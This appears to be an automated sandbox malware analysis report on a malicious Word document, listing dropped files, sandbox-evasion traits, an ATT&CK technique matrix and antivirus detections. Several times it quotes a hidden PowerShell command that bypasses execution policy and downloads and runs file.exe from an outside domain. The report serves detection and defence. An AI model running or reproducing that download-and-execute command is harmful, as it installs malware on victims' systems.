Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00404766 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,9_2_00404766
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: tomation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb1. source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb8t source: powershell.exe, 00000012.00000002.958909440.0000000002D54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbstem.M source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.958909440.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000000C.00000002.926351887.0000000002B54000.00000004.00000020.00020000.00000000.sdmp
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: Yara match File source: 00000009.00000002.1283953918.0000000006770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: libgdk_pixbuf-2.0-0.dll.9.dr Static PE information: section name: .xdata
Source: C:\Users\user\AppData\Roaming\file.exe Code function: 9_2_73C22288 GlobalFree,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,9_2_73C22288

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe
Source: C:\Users\user\AppData\Roaming\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\libgdk_pixbuf-2.0-0.dll
Source: C:\Users\user\AppData\Roaming\file.exe File created: C:\Users\user\AppData\Local\Temp\nsnC988.tmp\System.dll
Source: C:\Users\user\AppData\Roaming\file.exe File created: C:\Users\user\AppData\Local\Temp\nss4AE7.tmp\System.dll
Source: C:\Users\user\AppData\Roaming\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\ZedGraph.dll
Source: C:\Users\user\AppData\Roaming\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\httputility.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\file.exe
Source: C:\Users\user\AppData\Roaming\file.exe File created: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll
Source: C:\Users\user\AppData\Roaming\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\License.rtf
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\file.exe - Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe - Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe - Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Roaming\file.exe - RDTSC instruction interceptor: First address: 0000000007043C85 second address: 0000000007043C85 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F4EECA62E1Fh 0x00000006 test ch, FFFFFFD8h 0x00000009 test edx, D75238D0h 0x0000000f inc ebp 0x00000010 test ecx, edx 0x00000012 inc ebx 0x00000013 rdtsc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1580 - Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1696 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 912 - Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1704 - Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\file.exe - Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\libgdk_pixbuf-2.0-0.dll
Source: C:\Users\user\AppData\Roaming\file.exe - Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\ZedGraph.dll
Source: C:\Users\user\AppData\Roaming\file.exe - Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\httputility.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\file.exe - API coverage: 8.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\file.exe - Code function: 9_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,9_2_00405A19
Source: C:\Users\user\AppData\Roaming\file.exe - Code function: 9_2_004065CE FindFirstFileA,FindClose,9_2_004065CE
Source: C:\Users\user\AppData\Roaming\file.exe - Code function: 9_2_004027AA FindFirstFileA,9_2_004027AA
Source: C:\Users\user\AppData\Roaming\file.exe - Code function: 16_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,16_2_00405A19
Source: C:\Users\user\AppData\Roaming\file.exe - Code function: 16_2_004065CE FindFirstFileA,FindClose,16_2_004065CE
Source: C:\Users\user\AppData\Roaming\file.exe - Code function: 16_2_004027AA FindFirstFileA,16_2_004027AA
Source: C:\Users\user\AppData\Roaming\file.exe - API call chain: ExitProcess graph end node graph_9-4399
Source: C:\Users\user\AppData\Roaming\file.exe - API call chain: ExitProcess graph end node graph_9-4403
Source: C:\Users\user\AppData\Roaming\file.exe - API call chain: ExitProcess graph end node graph_16-4271
Source: C:\Users\user\AppData\Roaming\file.exe - API call chain: ExitProcess graph end node graph_16-4275
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: file.exe, 00000015.00000002.1283718581.00000000005D4000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Users\user\AppData\Roaming\file.exe - Code function: 9_2_73C22288 GlobalFree,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,9_2_73C22288
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\notepad.exe - Injected file: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe - Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\notepad.exe - Queries volume information: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT VolumeInformation
Source: C:\Users\user\AppData\Roaming\file.exe - Code function: 9_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,9_2_004033B3
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 1 Command and Scripting Interpreter | Path Interception | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
Default Accounts | 2 Scripting | Boot or Logon Initialization Scripts | 111 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | Exfiltration Over Bluetooth | 2 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 1 Native API | Logon Script (Windows) | Logon Script (Windows) | 21 Virtualization/Sandbox Evasion | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | 1 Shared Modules | Logon Script (Mac) | Logon Script (Mac) | 1 Access Token Manipulation | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | 33 Exploitation for Client Execution | Network Logon Script | Network Logon Script | 111 Process Injection | LSA Secrets | 3 File and Directory Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | 3 PowerShell | Rc.common | Rc.common | 1 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 114 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 2 Scripting | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Obfuscated Files or Information | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
[Behavior Graph ID: 829399, Sample: TEPO0015922.doc, Startdate: 18/03/2023, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
TEPO0015922.doc | 23% | ReversingLabs | Script.Trojan.Woreflint |
TEPO0015922.doc | 42% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe | 6% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsnC988.tmp\System.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nss4AE7.tmp\System.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\ZedGraph.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\httputility.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\libgdk_pixbuf-2.0-0.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\file.exe | 6% | ReversingLabs | |

Source | Detection | Scanner | Label | Link | Download
9.0.file.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491 | | Download File
21.0.file.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491 | | Download File
6.2.powershell.exe.36dfce5.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
16.2.file.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491 | | Download File
21.2.file.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491 | | Download File
16.0.file.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491 | | Download File
9.2.file.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491 | | Download File

Source | Detection | Scanner | Label | Link
thekaribacruisecompany.com | 0% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe |
http://ocsp.entrust.net03 | 0% | URL Reputation | safe |
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe |
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
httPs://thekaribacruisecompany.c | 0% | Avira URL Cloud | safe |
http://ocsp.entrust.net0D | 0% | URL Reputation | safe |
https://thekaribacruisecompany.com | 0% | Avira URL Cloud | safe |
httPs://thekaribacruisecompany.com/file.exePE | 0% | Avira URL Cloud | safe |
httPs://thekaribacruisecompany.com/file.exePEQ | 0% | Avira URL Cloud | safe |
httPs://thekaribacruisecompany.com/file.exe | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
thekaribacruisecompany.com | 149.102.154.62 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://thekaribacruisecompany.com/file.exe | false | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
httPs://thekaribacruisecompany.c | powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_Error | file.exe, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmp | false | | high
http://crl.entrust.net/server1.crl0 | powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ocsp.entrust.net03 | powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
httPs://thekaribacruisecompany.com/file.exePE | powershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
httPs://thekaribacruisecompany.com/file.exePEQ | powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
httPs://thekaribacruisecompany.com/file.exe | powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleaner | powershell.exe, 0000000C.00000002.925602681.00000000001B7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://thekaribacruisecompany.com | powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | file.exe, 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000009.00000000.921928467.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmp | false | | high
http://ocsp.entrust.net0D | powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/Yg | powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp | false | | high
